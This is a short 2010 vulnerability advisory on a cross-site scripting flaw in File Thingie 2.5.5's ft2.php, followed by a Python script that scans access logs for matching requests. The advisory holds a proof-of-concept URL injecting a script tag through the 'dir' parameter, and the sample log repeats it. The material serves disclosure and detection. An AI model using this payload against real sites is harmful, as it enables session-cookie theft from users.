File Thingie version 2.5.5 suffers from a cross-site scripting vulnerability.
c8596f2d6e6e69f97597d736d043f2c3293b6f3daf865e324b50dea5229ab68c
[#]----------------------------------------------------------------------------------------]
[#] Title: File Thingie v2.5.5 XSS Vulnerability
[#] Author: Jeremiah Talamantes (RedTeam Security)
[#] Website: http://www.redteamsecure.com/labs
[#] Date: 5/15/2010
[#]
[#] Application: File Thingie
[#] Version: 2.5.5
[#] Link: http://www.solitude.dk/filethingie/download
[#] Description: The vulnerability exists due to a failure in the "ft2.php" script
[#] to properly sanitize data. Successful compromise could result in theft of
[#] cookie data.
[#]----------------------------------------------------------------------------------------]
[ EXPLOIT POC ---------------------------------------------------------------------------------]
http://example.com/ft2.php?dir=2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[ EXPLOIT POC ---------------------------------------------------------------------------------]
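
One way to check web server logs for requests shaped like the PoC above, as an added example that is not part of the original advisory or of File Thingie. It assumes combined-format access logs and flags any ft2.php request whose decoded "dir" value contains quote or angle-bracket characters; the function names are hypothetical and the log lines are constructed samples.

```python
# Added example: flag access-log requests whose ft2.php "dir" value carries HTML markup.
import re
from urllib.parse import urlsplit, parse_qs

# Characters that let a value break out of an HTML attribute or open a tag.
MARKUP = re.compile(r'[<>"\']')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_dir_values(log_line, script="ft2.php"):
    """Return the decoded dir values in log_line that contain markup characters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/" + script):
        return []
    # parse_qs percent-decodes once, matching what PHP hands the script in $_GET.
    values = parse_qs(url.query, keep_blank_values=True).get("dir", [])
    return [v for v in values if MARKUP.search(v)]


def scan(lines):
    """Return (line_number, client_ip, value) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for value in suspicious_dir_values(line):
            hits.append((number, line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/May/2010:10:00:01 +0000] "GET /ft2.php?dir=/photos/2010 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [15/May/2010:10:00:09 +0000] "GET /ft2.php?dir=2%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 5342',
    '192.0.2.10 - - [15/May/2010:10:00:12 +0000] "GET /index.php?dir=%3Cb%3E HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent dir={value!r}")
```

A hit only shows that a request carried markup in "dir"; whether the response reflected it unescaped still has to be confirmed against the installed version.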